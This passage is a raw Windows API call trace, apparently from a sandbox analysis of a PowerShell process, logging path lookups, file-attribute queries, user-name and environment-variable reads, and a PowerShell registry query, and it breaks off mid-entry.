[0053.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, 
lpBuffer=0x14e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.376] GetLastError () returned 0xcb [0053.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14e590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.376] GetLastError () returned 0xcb [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, 
nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.377] GetLastError () returned 0xcb [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14e590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.377] GetLastError () returned 0xcb [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14ea6c | out: lpFileInformation=0x14ea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xe0ad1920, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xe0ad1920, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14ea6c | out: lpFileInformation=0x14ea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, 
ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xe0ad1920, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xe0ad1920, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.377] GetLastError () returned 0xcb [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14e59c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.377] GetLastError () returned 0xcb [0053.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.378] GetLastError () returned 0xcb [0053.378] SetErrorMode (uMode=0x1) returned 0x1 [0053.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14ea6c | out: lpFileInformation=0x14ea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.378] GetLastError () returned 0xcb [0053.378] SetErrorMode (uMode=0x1) returned 0x1 [0053.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.378] GetLastError () returned 0xcb [0053.378] SetErrorMode (uMode=0x1) returned 0x1 [0053.378] GetFileAttributesExW 
(in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14ea6c | out: lpFileInformation=0x14ea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.378] GetLastError () returned 0xcb [0053.378] SetErrorMode (uMode=0x1) returned 0x1 [0053.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.378] GetLastError () returned 0xcb [0053.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14e59c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.378] GetLastError () returned 0xcb [0053.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.379] GetLastError () returned 0xcb [0053.379] SetErrorMode (uMode=0x1) returned 0x1 [0053.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29f9de8 | out: lpFileInformation=0x29f9de8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.379] GetLastError () returned 0xcb [0053.379] SetErrorMode (uMode=0x1) returned 0x1 [0053.380] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.380] GetLastError () returned 0xcb [0053.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.380] GetLastError () returned 0xcb [0053.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.380] GetLastError () returned 0xcb [0053.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.380] GetLastError () returned 0xcb [0053.414] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14ec58 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14ec58) returned 0x1 [0053.414] GetLastError () returned 0xcb [0053.415] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14ec60 | out: 
lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14ec60) returned 1 [0053.415] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x22ddf70*="Available", lpRawData=0x22dde2c) returned 1 [0053.415] GetLastError () returned 0x0 [0053.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.416] GetLastError () returned 0xcb [0053.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.416] GetLastError () returned 0xcb [0053.417] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0053.417] GetLastError () returned 0xcb [0053.417] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="\\Users\\BGC6u8Oy yXGxkR") returned 0x16 [0053.417] GetLastError () returned 0xcb [0053.417] GetCurrentProcessId () returned 0xb44 [0053.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ebec | out: phkResult=0x14ebec*=0x328) returned 0x0 [0053.418] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ec34, lpData=0x0, lpcbData=0x14ec30*=0x0 | out: lpType=0x14ec34*=0x1, lpData=0x0, lpcbData=0x14ec30*=0x56) returned 0x0 [0053.418] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ec34, lpData=0x3175c0, lpcbData=0x14ec30*=0x56 | out: lpType=0x14ec34*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ec30*=0x56) returned 0x0 [0053.418] RegCloseKey (hKey=0x328) returned 0x0 [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 
lpBuffer=0x14e6dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb 
[0053.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e674, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.418] GetLastError () returned 0xcb [0053.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.438] GetLastError () returned 0xcb [0053.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.438] GetLastError () returned 0xcb [0053.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.438] GetLastError () returned 0xcb [0053.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.438] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.439] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: 